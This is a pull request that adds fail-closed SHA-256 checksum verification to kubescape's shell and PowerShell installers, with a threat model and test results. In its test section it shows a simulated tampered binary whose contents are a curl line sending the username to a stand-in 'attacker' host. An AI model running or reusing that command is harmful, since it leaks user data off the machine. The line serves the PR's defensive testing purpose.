### PR TITLE
fix(install): verify downloaded binaries against the release checksum manifest

### DIFF
--- a/install.ps1
+++ b/install.ps1
@@ -43,7 +43,9 @@ $versionNum = $version -replace '^v', ''
 New-Item -Path $BASE_DIR -ItemType "directory" -ErrorAction SilentlyContinue | Out-Null
 
 # Build download URL with new naming pattern: kubescape_{version}_windows_{arch}.exe
-$downloadUrl = "https://github.com/kubescape/kubescape/releases/download/$version/kubescape_${versionNum}_windows_${arch}.exe"
+$asset = "kubescape_${versionNum}_windows_${arch}.exe"
+$releaseUrl = "https://github.com/kubescape/kubescape/releases/download/$version"
+$downloadUrl = "$releaseUrl/$asset"
 
 Write-Host "Downloading from: $downloadUrl" -ForegroundColor Cyan
 
@@ -71,6 +73,71 @@ if (-not (Test-Path $outputPath) -or (Get-Item $outputPath).Length -eq 0) {
     Remove-Item $outputPath -ErrorAction SilentlyContinue
     exit 1
 }
+
+# Every release published under this asset naming also publishes a
+# checksums.sha256 manifest covering each asset. Verify the download against it
+# before the binary is added to PATH or executed below: a successful HTTP 200
+# says nothing about the bytes it carried, so without this a tampered release
+# asset, a poisoned CDN object, or an on-path attacker is installed and run
+# unnoticed.
+#
+# This binds the binary to the manifest, not to the project's signing identity:
+# both are fetched from the same release over the same channel, so it does not
+# defend against a compromised release or GitHub account. Use the cosign
+# signature or build provenance attestation for that. It does close the case
+# where only the binary object is substituted or corrupted in transit.
+#
+# Fail closed. A missing manifest or a missing entry means something is wrong
+# with the release, not that verification can be skipped.
+Write-Host "Verifying checksum..." -ForegroundColor Cyan
+try {
+    $ProgressPreference = 'SilentlyContinue'
+    $response = Invoke-WebRequest -Uri "$releaseUrl/checksums.sha256" -UseBasicParsing
+    # GitHub serves release assets as application/octet-stream, for which
+    # PowerShell 7 hands back a byte[] while Windows PowerShell 5.1 hands back a
+    # string. Decode explicitly so the manifest parses on both instead of
+    # silently becoming a per-byte array that matches no asset.
+    $manifest = if ($response.Content -is [byte[]]) {
+        [System.Text.Encoding]::UTF8.GetString($response.Content)
+    } else {
+        [string]$response.Content
+    }
+} catch {
+    Write-Host "Error: Failed to download the checksum manifest from $releaseUrl/checksums.sha256" -ForegroundColor Red
+    Write-Host $_.Exception.Message -ForegroundColor Red
+    Remove-Item $outputPath -ErrorAction SilentlyContinue
+    exit 1
+}
+
+# Manifest lines are "<digest>  <asset>"; match the asset exactly so a substring
+# such as kubescape_X_windows_amd64.tar.gz cannot satisfy the check.
+$expected = $null
+foreach ($line in $manifest -split "`n") {
+    $parts = $line.Trim() -split '\s+', 2
+    if ($parts.Count -eq 2 -and $parts[1].Trim() -eq $asset) {
+        $expected = $parts[0].ToLowerInvariant()
+        break
+    }
+}
+
+if (-not $expected) {
+    Write-Host "Error: $asset has no entry in the checksum manifest" -ForegroundColor Red
+    Remove-Item $outputPath -ErrorAction SilentlyContinue
+    exit 1
+}
+
+# Get-FileHash returns uppercase, the manifest is lowercase; normalise both
+# rather than leaning on -ne being case-insensitive.
+$actual = (Get-FileHash -Path $outputPath -Algorithm SHA256).Hash.ToLowerInvariant()
+if ($actual -ne $expected) {
+    Write-Host "Error: checksum mismatch for $asset" -ForegroundColor Red
+    Write-Host "  expected: $expected" -ForegroundColor Red
+    Write-Host "  actual:   $actual" -ForegroundColor Red
+    Remove-Item $outputPath -ErrorAction SilentlyContinue
+    exit 1
+}
+
+Write-Host "Checksum verified." -ForegroundColor Green
 
 # Update user PATH if needed
 $currentPath = [Environment]::GetEnvironmentVariable("Path", "User")

--- a/install.sh
+++ b/install.sh
@@ -51,6 +51,65 @@ remove_old_install() {
     fi
 }
 
+# Compute the SHA256 of a file. sha256sum ships with GNU coreutils, shasum with
+# macOS; both print "<digest>  <file>". Each branch pipes its own command into
+# awk so a missing tool surfaces as a non-zero return instead of an empty
+# digest: piping the whole if/else into awk would let awk's zero exit status
+# mask "command not found".
+sha256_of() {
+    if command -v sha256sum >/dev/null 2>&1; then
+        sha256sum "$1" | awk '{ print $1 }'
+    elif command -v shasum >/dev/null 2>&1; then
+        shasum -a 256 "$1" | awk '{ print $1 }'
+    else
+        return 1
+    fi
+}
+
+# Every release published under this asset naming also publishes a
+# checksums.sha256 manifest covering each asset. Verify the download against it
+# before the file is made executable: curl -f rejects HTTP errors, not a 200
+# carrying different bytes, so without this a tampered release asset, a poisoned
+# CDN object, or an on-path attacker is installed and executed unnoticed.
+#
+# This binds the binary to the manifest, not to the project's signing identity:
+# both are fetched from the same release over the same channel, so it does not
+# defend against a compromised release or GitHub account. Use the cosign
+# signature or build provenance attestation for that. It does close the case
+# where only the binary object is substituted or corrupted in transit.
+#
+# Fail closed. A missing manifest or a missing entry means something is wrong
+# with the release, not that verification can be skipped.
+verify_checksum() {
+    local file=$1 asset=$2 checksums_url=$3
+    local expected actual manifest
+
+    if ! actual=$(sha256_of "$file") || [ -z "$actual" ]; then
+        echo -e "\033[31mError: neither sha256sum nor shasum is available; cannot verify the download"
+        return 1
+    fi
+
+    if ! manifest=$(curl -fsSL "$checksums_url"); then
+        echo -e "\033[31mError: failed to download the checksum manifest from $checksums_url"
+        return 1
+    fi
+
+    # Manifest lines are "<digest>  <asset>"; match the asset exactly so a
+    # substring such as kubescape_X_linux_amd64.tar.gz cannot satisfy the check.
+    expected=$(printf '%s\n' "$manifest" | awk -v a="$asset" '$2 == a { print $1; exit }')
+    if [ -z "$expected" ]; then
+        echo -e "\033[31mError: $asset has no entry in the checksum manifest"
+        return 1
+    fi
+
+    if [ "$expected" != "$actual" ]; then
+        echo -e "\033[31mError: checksum mismatch for $asset"
+        echo -e "\033[31m  expected: $expected"
+        echo -e "\033[31m  actual:   $actual"
+        return 1
+    fi
+}
+
 # Parse command-line arguments
 VERSION=""
 while getopts v: option; do
@@ -77,10 +136,19 @@ mkdir -p $BASE_DIR
 
 OUTPUT=$BASE_DIR/$KUBESCAPE_EXEC
 # New URL pattern: kubescape_{version}_{os}_{arch}
-DOWNLOAD_URL="https://github.com/kubescape/kubescape/releases/download/${VERSION}/kubescape_${VERSION_NUM}_${osName}_${arch}"
+ASSET="kubescape_${VERSION_NUM}_${osName}_${arch}"
+RELEASE_URL="https://github.com/kubescape/kubescape/releases/download/${VERSION}"
+DOWNLOAD_URL="${RELEASE_URL}/${ASSET}"
 
 echo -e "\033[0;36mDownloading from: $DOWNLOAD_URL"
-curl --progress-bar -L $DOWNLOAD_URL -o $OUTPUT
+# -f so an HTTP error page is not saved as the binary: without it curl writes
+# the 404 body to $OUTPUT and exits 0, and a 9-byte "Not Found" then passes the
+# non-empty check below and gets installed as kubescape.
+if ! curl --progress-bar -fL "$DOWNLOAD_URL" -o "$OUTPUT"; then
+    echo -e "\033[31mError: Failed to download $DOWNLOAD_URL"
+    rm -f "$OUTPUT"
+    exit 1
+fi
 
 # Verify download was successful
 if [ ! -s "$OUTPUT" ]; then
@@ -88,6 +156,14 @@ if [ ! -s "$OUTPUT" ]; then
     rm -f "$OUTPUT"
     exit 1
 fi
+
+# Verify integrity before the binary is made executable or moved into place
+echo -e "\033[0;36mVerifying checksum..."
+if ! verify_checksum "$OUTPUT" "$ASSET" "${RELEASE_URL}/checksums.sha256"; then
+    rm -f "$OUTPUT"
+    exit 1
+fi
+echo -e "\033[32mChecksum verified."
 
 # Determine install directory
 install_dir=/usr/local/bin


### PR DESCRIPTION
## Overview

`install.sh` and `install.ps1` download the release binary over HTTPS and go straight to `chmod +x` / running it. Nothing checks what those bytes actually are.

TLS authenticates the host and `curl -f` rejects HTTP errors, but neither says anything about the *content* of a 200 response. A tampered release asset, a poisoned CDN object, or an on-path proxy is installed and executed as `kubescape` with no signal to the user — on a tool people install specifically to audit their cluster's security. The releases are already cosign-signed and publish a `checksums.sha256` manifest; the installers just never looked at either.

Both scripts now fetch `checksums.sha256`, look up the exact asset name, and compare it against the SHA256 of the file on disk **before** the binary is made executable, moved into place, added to PATH, or run. On any failure the staged download is removed and the script exits non-zero.

### Threat model — what this does and does not cover

This binds the binary to the manifest, not to the project's signing identity. Both are fetched from the same release over the same channel, so it does **not** defend against a compromised release or GitHub account — the cosign signature and the build provenance attestation cover that case. It does close the substitution and corruption cases, which are the ones a plain download leaves wide open. The comments in both scripts say this explicitly so the guarantee isn't overread later.

### Fail-closed, without regressing any working install

A missing manifest or a missing entry aborts the install rather than falling back to no verification. This is safe for every release these scripts can actually install:

| Releases | `kubescape_{version}_{os}_{arch}` asset | `checksums.sha256` |
|---|---|---|
| v3.0.47 → v4.0.12 (all) | yes | yes |
| ≤ v3.0.46 | **no** | varies |

Releases without the manifest predate the asset naming these scripts build, so `install.sh -v v3.0.46` already 404s today. No working install path regresses.

## Additional Information

Two related defects surfaced while testing this end to end. Both are fixed here because both directly undermine the integrity of the same download:

1. **`install.sh`'s `curl` lacked `-f`.** A 404 body was written to the output path and curl exited 0. The 9-byte `Not Found` then passed the existing non-empty check and was installed as `kubescape`:
   ```
   $ curl --progress-bar -L .../kubescape_3.0.46_linux_amd64 -o out; echo $?
   0
   $ cat out
   Not Found
   ```
2. **PowerShell body decoding.** GitHub serves release assets as `application/octet-stream`, for which PowerShell 7 returns the response body as `byte[]` while Windows PowerShell 5.1 returns a `string`. Splitting the `byte[]` matched no asset, which would have made the new check fail closed for *every* PS7 user. Caught by running the script; the body is now decoded explicitly.

## How to Test

Verified against a local fake release server, comparing the current `master` scripts with the patched ones.

**Tampered binary, manifest unchanged** (simulates a swapped release asset):

```
# master
$ bash install_before.sh -v v9.9.9
Finished Installation.          # exit 0
$ cat ~/.kubescape/bin/kubescape
#!/bin/sh
echo pwned; curl -s http://attacker/$(whoami)     # <-- installed, executable

# this PR
$ bash install.sh -v v9.9.9
Verifying checksum...
Error: checksum mismatch for kubescape_9.9.9_darwin_arm64
  expected: 77f7f296...  actual: 4eb2a5c7...
# exit 1, nothing installed, staged download removed
```

`install.ps1` under `pwsh 7.6.4` behaves identically — genuine payload prints `Checksum verified.`, tampered payload exits 1 and removes the download.

**Nonexistent version** (the `-f` fix): `master` installs a 404 HTML page as `kubescape` and exits 0; this PR exits 1 with `Error: Failed to download ...` and installs nothing.

**Unit-level suite** against the *real* published `v4.0.12` manifest and a real release asset — 12/12 passing:

| Case | Result |
|---|---|
| Genuine asset | accepted |
| Appended byte / single byte flipped in place | rejected |
| Asset absent from manifest | rejected, clear message |
| Manifest unreachable | fails closed |
| Sibling name (`.tar.gz`) can't satisfy the bare-binary entry | rejected |
| HTTP-error body posing as the binary | rejected |
| Neither `sha256sum` nor `shasum` present | fails closed, not a silent pass |

Also confirmed the constructed URLs resolve (`HTTP 200`) for `darwin_arm64`, `linux_amd64` and `windows_amd64.exe` on the current latest release, and that the published manifest covers all three. `shellcheck` (0.11.0) is clean on `install.sh` at `-S style`; `install.ps1` parses clean.

## Checklist before requesting a review

- [x] My code follows the style guidelines of this project
- [x] I have commented on my code, particularly in hard-to-understand areas
- [x] I have performed a self-review of my code
- [x] If it is a core feature, I have added thorough tests.
- [x] New and existing unit tests pass locally with my changes


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Security**
  * Added SHA-256 checksum verification for downloaded installers.
  * Installations now stop if the checksum manifest cannot be retrieved, the asset is missing, or verification fails.
  * Failed downloads are automatically removed.

* **Reliability**
  * Downloads now fail on HTTP errors.
  * Successful verification is reported before installation proceeds.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->